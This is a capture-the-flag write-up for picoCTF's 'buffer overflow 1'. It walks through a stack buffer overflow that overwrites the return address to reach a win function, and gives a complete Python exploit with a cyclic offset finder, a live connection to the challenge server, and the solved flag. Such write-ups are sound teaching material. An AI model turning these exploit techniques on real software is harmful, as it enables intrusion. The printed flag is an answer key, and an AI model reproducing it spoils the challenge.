Sanjay C / Palash Oswal
Control the return address. Now we're cooking! You can overflow the buffer and return to the flag function in the program. You can view source here. And connect with it using nc saturn.picoctf.net 63077
- Make sure you consider big-endian vs little-endian.
- Changing the saved return address can call different functions.
Read vuln.c and notice that the win function gives the flag.
Open vuln in Ghidra, go to the function list and look up win: the address Ghidra shows for it is the value we overwrite the saved return address with.
Run script.py to solve the challenge. pwntools is a Python library that's really useful for solving pwn (binary exploitation) challenges. The script connects to the service, then sends 44 bytes of padding followed by the address of win, packed little-endian, so that when the vulnerable function returns it lands in win instead of returning to its caller.
The 44 was found by trial and error; it is the distance from the start of the overflowed buffer to the saved return address (the buffer itself plus whatever the compiler placed between it and the saved frame pointer and return address). It can be found deterministically instead: feed the program a cyclic pattern under gdb, read the faulting instruction pointer (EIP on a 32-bit x86 target), and look up that value's offset in the pattern, which is exactly what pwntools' cyclic and cyclic_find do.
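The same approach in code, as an added example that is not the writeup's script.py: a pure-Python payload builder (struct.pack in place of pwntools' p32) plus a small cyclic-pattern helper that replaces the trial and error behind the 44-byte offset. It assumes a 32-bit little-endian x86 target; the win address 0x080491F6 in the connection block is a placeholder, so take the real value from Ghidra's listing of win.

```python
# Added example (not the original script.py): payload for "buffer overflow 1" and a
# cyclic-pattern helper that finds the padding length deterministically.
import struct

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"


def _de_bruijn(alphabet, n):
    """Yield a De Bruijn sequence B(k, n): every n-byte window occurs exactly once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for i in range(1, p + 1):
                    yield alphabet[a[i]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length, n=4):
    """First `length` bytes of the pattern (same output as pwntools' cyclic())."""
    out = bytearray()
    for ch in _de_bruijn(ALPHABET, n):
        if len(out) == length:
            break
        out.append(ch)
    return bytes(out)


def cyclic_find(value, n=4, max_len=1024):
    """Offset of a 4-byte window in the pattern. `value` is either the 4 bytes
    themselves or the crashing EIP as an int; an int is re-packed little-endian,
    which is how those bytes were laid out in memory on 32-bit x86 (assumed target)."""
    if isinstance(value, int):
        value = struct.pack("<I", value)
    return cyclic(max_len, n).find(value)


def build_payload(win_addr, offset=44):
    """`offset` bytes of filler reach the saved return address (44 for this binary);
    the next 4 bytes overwrite it with win()'s address in little-endian order."""
    return b"a" * offset + struct.pack("<I", win_addr)


if __name__ == "__main__":
    from pwn import remote  # pwntools, only needed for the live connection

    WIN_ADDR = 0x080491F6  # assumed placeholder: use the address Ghidra shows for win()
    io = remote("saturn.picoctf.net", 63077)
    io.sendline(build_payload(WIN_ADDR))  # gets()-style reads stop at the newline
    print(io.recvall(timeout=3).decode(errors="replace"))
```

To find the offset without guessing, run the binary under gdb with cyclic(100) as input, read the instruction pointer it crashes with, and pass that integer to cyclic_find; for this binary it would return 44, which is the offset build_payload uses by default.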
picoCTF{addr3ss3s_ar3_3asy_60fac6aa}